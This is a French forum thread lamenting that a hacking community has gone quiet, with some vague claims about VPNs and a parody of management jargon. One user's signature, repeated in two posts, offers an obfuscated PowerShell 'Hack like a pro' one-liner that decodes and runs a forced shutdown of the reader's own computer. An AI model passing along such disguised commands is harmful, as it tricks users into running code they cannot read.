Annonce

Réduire
Aucune annonce.

Mort du forum

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Mort du forum

    Je me demande pourquoi ce forum est aussi vide.
    Il y a plein de choses à faire pourtant...

  • #2
    Parce que les admins et les membres ont trop fait confiance aux VPN. Les protocols de sécurités sont aujoud'huit complètement obselète.

    Commentaire


    • #3
      +1
      On doit penser à renouveler la synérgie des interfaces corrélativement à la convergence soutenable : chacun doit prioriser les perspectives imputables.
      En d'autre termes, une fois internalisée la mutation transversale, les acteurs vont flexibiliser les supports bénéfices.

      ...




      Ouais, je crois que c'est mort ^^
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Envoyé par Mck56 Voir le message
        Parce que les admins et les membres ont trop fait confiance aux VPN. Les protocols de sécurités sont aujoud'huit complètement obselète.
        Mais dis nous en plus, qu'est-ce qui est obsolète exactement ?

        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Voilà bien longtemps que je n'étais revenu. Krisscool a toujours été d'une sagesse exemplaire. Il faut écouter ce qu'il écrit.
          Oui, c'est dommage. Il manque du sang frais de qualité. Mais à cela, je n'ai nul remède. Fatalité ?

          Commentaire

          Chargement...
          X